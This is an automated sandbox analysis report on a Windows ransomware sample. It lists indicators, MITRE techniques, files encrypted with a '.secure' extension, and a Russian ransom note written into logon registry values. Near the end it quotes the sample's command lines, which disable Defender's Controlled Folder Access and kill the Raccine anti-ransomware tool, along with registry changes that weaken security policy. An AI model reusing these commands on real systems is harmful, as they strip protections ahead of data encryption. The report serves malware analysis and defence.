2481bcb7380b038e84a6052a3cc42fab8e791cf1dffaefe783398a843af68c22

Analysis

max time kernel
154s
max time network
63s
platform
windows7_x64
resource
win7v20210408
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
Size

353KB
MD5

3de060c1a25fb75735767e9450ed797d
SHA1

8c0e899fc89aa8e0201aa8ee4ba41cd05702116e
SHA256

48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698
SHA512

4792c3c919c87269544bbe60b62930059f71421eae0a736113e4472e14cfebf95b16ebc430e441a88655fcb84397d5959367061e59d58deaf26de43915eea37b

Score

10^/10

discovery evasion persistence ransomware trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Disables Task Manager via registry modification
evasion
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Modifies extensions of user files 18 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\BackupTrace.tif.secure	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
File renamed	C:\Users\Admin\Pictures\RevokeEdit.crw => C:\Users\Admin\Pictures\RevokeEdit.crw.secure	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
File opened for modification	C:\Users\Admin\Pictures\RevokeEdit.crw.secure	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
File opened for modification	C:\Users\Admin\Pictures\AddGroup.png.secure	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
File opened for modification	C:\Users\Admin\Pictures\PopShow.crw.secure	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
File renamed	C:\Users\Admin\Pictures\UnprotectBackup.crw => C:\Users\Admin\Pictures\UnprotectBackup.crw.secure	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
File renamed	C:\Users\Admin\Pictures\PopShow.crw => C:\Users\Admin\Pictures\PopShow.crw.secure	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
File renamed	C:\Users\Admin\Pictures\AddGroup.png => C:\Users\Admin\Pictures\AddGroup.png.secure	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
File renamed	C:\Users\Admin\Pictures\BackupTrace.tif => C:\Users\Admin\Pictures\BackupTrace.tif.secure	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
File renamed	C:\Users\Admin\Pictures\ConfirmSet.tif => C:\Users\Admin\Pictures\ConfirmSet.tif.secure	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
File opened for modification	C:\Users\Admin\Pictures\ConfirmSet.tif.secure	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
File opened for modification	C:\Users\Admin\Pictures\MergeApprove.tiff	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
File renamed	C:\Users\Admin\Pictures\MergeApprove.tiff => C:\Users\Admin\Pictures\MergeApprove.tiff.secure	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
File opened for modification	C:\Users\Admin\Pictures\MergeApprove.tiff.secure	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
File opened for modification	C:\Users\Admin\Pictures\WatchPing.tiff	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
File renamed	C:\Users\Admin\Pictures\WatchPing.tiff => C:\Users\Admin\Pictures\WatchPing.tiff.secure	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
File opened for modification	C:\Users\Admin\Pictures\WatchPing.tiff.secure	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
File opened for modification	C:\Users\Admin\Pictures\UnprotectBackup.crw.secure	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1728	icacls.exe
1940	icacls.exe
1844	icacls.exe
1976	icacls.exe
980	icacls.exe
1940	icacls.exe
1844	icacls.exe
828	icacls.exe
1836	icacls.exe
1500	icacls.exe
1088	icacls.exe
1804	icacls.exe
1912	icacls.exe
1368	icacls.exe
1804	icacls.exe
984	icacls.exe
884	icacls.exe
1584	icacls.exe
1580	icacls.exe
568	icacls.exe
1488	icacls.exe
1140	icacls.exe
620	icacls.exe
944	icacls.exe
1960	icacls.exe
1980	icacls.exe
1784	icacls.exe
1576	icacls.exe
1480	icacls.exe
1632	icacls.exe
1368	icacls.exe
1632	icacls.exe
1144	icacls.exe
1288	icacls.exe
1712	icacls.exe
796	icacls.exe
1568	icacls.exe
1912	icacls.exe
1352	icacls.exe
1808	icacls.exe
1708	icacls.exe
564	icacls.exe
1976	icacls.exe
328	icacls.exe
576	icacls.exe
1324	icacls.exe
408	icacls.exe
1768	icacls.exe
1768	icacls.exe
1804	icacls.exe
328	icacls.exe
1768	icacls.exe
1352	icacls.exe
1520	icacls.exe
1844	icacls.exe
1504	icacls.exe
1620	icacls.exe
1360	icacls.exe
1308	icacls.exe
1808	icacls.exe
1820	icacls.exe
1680	icacls.exe
1668	icacls.exe
1988	icacls.exe

Windows security modification 2 TTPs 1 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Внимание Внимание Внимание!"	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Добрый день. У Вас возникли сложности на работе? \r\nНе стоит переживать, наши IT-специалисты помогут Вам.\r\nДля этого напишите пожалуйста нам на почту.\r\n\r\nНаш email - [email protected]\r\n\r\nХорошего и продуктивного дня!\r\n\r\n\r\n(с) Каждый человек — программист собственного счастья и хакер чужого."	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 58 IoCs

evasion

pid	Process
532	taskkill.exe
1812	taskkill.exe
1088	taskkill.exe
1084	taskkill.exe
944	taskkill.exe
1616	taskkill.exe
916	taskkill.exe
1680	taskkill.exe
580	taskkill.exe
480	taskkill.exe
852	taskkill.exe
276	taskkill.exe
976	taskkill.exe
1816	taskkill.exe
1944	taskkill.exe
328	taskkill.exe
1988	taskkill.exe
1188	taskkill.exe
1772	taskkill.exe
1692	taskkill.exe
480	taskkill.exe
328	taskkill.exe
428	taskkill.exe
1496	taskkill.exe
1640	taskkill.exe
1800	taskkill.exe
1576	taskkill.exe
1776	taskkill.exe
1964	taskkill.exe
920	taskkill.exe
1524	taskkill.exe
1144	taskkill.exe
964	taskkill.exe
1000	taskkill.exe
1060	taskkill.exe
1592	taskkill.exe
1796	taskkill.exe
1804	taskkill.exe
1728	taskkill.exe
1972	taskkill.exe
1976	taskkill.exe
1760	taskkill.exe
1844	taskkill.exe
852	taskkill.exe
1300	taskkill.exe
1404	taskkill.exe
1484	taskkill.exe
1660	taskkill.exe
1692	taskkill.exe
1060	taskkill.exe
1608	taskkill.exe
980	taskkill.exe
1972	taskkill.exe
900	taskkill.exe
984	taskkill.exe
1072	taskkill.exe
576	taskkill.exe
576	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1480	reg.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
980	PING.EXE
1796	PING.EXE
1580	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 62 IoCs

description	pid	Process
Token: SeDebugPrivilege	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
Token: SeDebugPrivilege	1300	powershell.exe
Token: SeDebugPrivilege	1784	powershell.exe
Token: SeDebugPrivilege	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
Token: SeDebugPrivilege	328	taskkill.exe
Token: SeDebugPrivilege	1072	taskkill.exe
Token: SeDebugPrivilege	1524	taskkill.exe
Token: SeDebugPrivilege	1144	taskkill.exe
Token: SeDebugPrivilege	1088	taskkill.exe
Token: SeDebugPrivilege	1692	taskkill.exe
Token: SeDebugPrivilege	916	taskkill.exe
Token: SeDebugPrivilege	428	taskkill.exe
Token: SeDebugPrivilege	576	taskkill.exe
Token: SeDebugPrivilege	852	taskkill.exe
Token: SeDebugPrivilege	1060	taskkill.exe
Token: SeDebugPrivilege	1608	conhost.exe
Token: SeDebugPrivilege	1944	conhost.exe
Token: SeDebugPrivilege	1496	taskkill.exe
Token: SeDebugPrivilege	1084	taskkill.exe
Token: SeDebugPrivilege	964	Process not Found
Token: SeDebugPrivilege	1592	taskkill.exe
Token: SeDebugPrivilege	980	taskkill.exe
Token: SeDebugPrivilege	1800	taskkill.exe
Token: SeDebugPrivilege	1188	taskkill.exe
Token: SeDebugPrivilege	1300	conhost.exe
Token: SeDebugPrivilege	276	taskkill.exe
Token: SeDebugPrivilege	1976	conhost.exe
Token: SeDebugPrivilege	1640	taskkill.exe
Token: SeDebugPrivilege	1576	taskkill.exe
Token: SeDebugPrivilege	1776	taskkill.exe
Token: SeDebugPrivilege	944	taskkill.exe
Token: SeDebugPrivilege	976	taskkill.exe
Token: SeDebugPrivilege	1972	taskkill.exe
Token: SeDebugPrivilege	1760	taskkill.exe
Token: SeDebugPrivilege	1680	taskkill.exe
Token: SeDebugPrivilege	328	taskkill.exe
Token: SeDebugPrivilege	480	taskkill.exe
Token: SeDebugPrivilege	1988	taskkill.exe
Token: SeDebugPrivilege	580	taskkill.exe
Token: SeDebugPrivilege	900	taskkill.exe
Token: SeDebugPrivilege	1404	taskkill.exe
Token: SeDebugPrivilege	1000	taskkill.exe
Token: SeDebugPrivilege	1772	conhost.exe
Token: SeDebugPrivilege	1804	conhost.exe
Token: SeDebugPrivilege	1796	taskkill.exe
Token: SeDebugPrivilege	1844	taskkill.exe
Token: SeDebugPrivilege	920	taskkill.exe
Token: SeDebugPrivilege	1484	taskkill.exe
Token: SeDebugPrivilege	1660	taskkill.exe
Token: SeDebugPrivilege	1812	taskkill.exe
Token: SeDebugPrivilege	1616	taskkill.exe
Token: SeDebugPrivilege	852	taskkill.exe
Token: SeDebugPrivilege	1816	taskkill.exe
Token: SeDebugPrivilege	480	taskkill.exe
Token: SeDebugPrivilege	1692	taskkill.exe
Token: SeDebugPrivilege	1728	taskkill.exe
Token: SeDebugPrivilege	1964	taskkill.exe
Token: SeDebugPrivilege	984	taskkill.exe
Token: SeDebugPrivilege	1060	taskkill.exe
Token: SeDebugPrivilege	576	taskkill.exe
Token: SeDebugPrivilege	1972	taskkill.exe
Token: SeDebugPrivilege	1776	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 280 wrote to memory of 1300	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	30
PID 280 wrote to memory of 1300	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	30
PID 280 wrote to memory of 1300	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	30
PID 280 wrote to memory of 1784	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	32
PID 280 wrote to memory of 1784	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	32
PID 280 wrote to memory of 1784	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	32
PID 280 wrote to memory of 328	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	34
PID 280 wrote to memory of 328	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	34
PID 280 wrote to memory of 328	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	34
PID 280 wrote to memory of 1620	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	36
PID 280 wrote to memory of 1620	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	36
PID 280 wrote to memory of 1620	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	36
PID 280 wrote to memory of 1480	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	39
PID 280 wrote to memory of 1480	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	39
PID 280 wrote to memory of 1480	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	39
PID 280 wrote to memory of 1760	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	40
PID 280 wrote to memory of 1760	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	40
PID 280 wrote to memory of 1760	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	40
PID 280 wrote to memory of 1572	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	42
PID 280 wrote to memory of 1572	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	42
PID 280 wrote to memory of 1572	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	42
PID 280 wrote to memory of 1684	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	50
PID 280 wrote to memory of 1684	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	50
PID 280 wrote to memory of 1684	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	50
PID 280 wrote to memory of 944	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	44
PID 280 wrote to memory of 944	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	44
PID 280 wrote to memory of 944	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	44
PID 280 wrote to memory of 1732	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	48
PID 280 wrote to memory of 1732	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	48
PID 280 wrote to memory of 1732	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	48
PID 280 wrote to memory of 900	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	46
PID 280 wrote to memory of 900	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	46
PID 280 wrote to memory of 900	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	46
PID 280 wrote to memory of 1084	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	51
PID 280 wrote to memory of 1084	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	51
PID 280 wrote to memory of 1084	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	51
PID 280 wrote to memory of 428	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	54
PID 280 wrote to memory of 428	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	54
PID 280 wrote to memory of 428	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	54
PID 280 wrote to memory of 1772	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	56
PID 280 wrote to memory of 1772	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	56
PID 280 wrote to memory of 1772	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	56
PID 280 wrote to memory of 1092	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	58
PID 280 wrote to memory of 1092	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	58
PID 280 wrote to memory of 1092	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	58
PID 280 wrote to memory of 1524	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	60
PID 280 wrote to memory of 1524	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	60
PID 280 wrote to memory of 1524	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	60
PID 280 wrote to memory of 1072	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	61
PID 280 wrote to memory of 1072	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	61
PID 280 wrote to memory of 1072	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	61
PID 280 wrote to memory of 1144	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	62
PID 280 wrote to memory of 1144	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	62
PID 280 wrote to memory of 1144	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	62
PID 280 wrote to memory of 1816	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	66
PID 280 wrote to memory of 1816	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	66
PID 280 wrote to memory of 1816	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	66
PID 280 wrote to memory of 1088	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	68
PID 280 wrote to memory of 1088	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	68
PID 280 wrote to memory of 1088	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	68
PID 280 wrote to memory of 916	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	70
PID 280 wrote to memory of 916	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	70
PID 280 wrote to memory of 916	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	70
PID 280 wrote to memory of 1692	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	164

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Внимание Внимание Внимание!"	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "Добрый день. У Вас возникли сложности на работе? \r\nНе стоит переживать, наши IT-специалисты помогут Вам.\r\nДля этого напишите пожалуйста нам на почту.\r\n\r\nНаш email - [email protected]\r\n\r\nХорошего и продуктивного дня!\r\n\r\n\r\n(с) Каждый человек — программист собственного счастья и хакер чужого."	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe

C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"
1⤵
- Modifies extensions of user files
- Windows security modification
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:280
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1300
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1784
- C:\Windows\system32\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
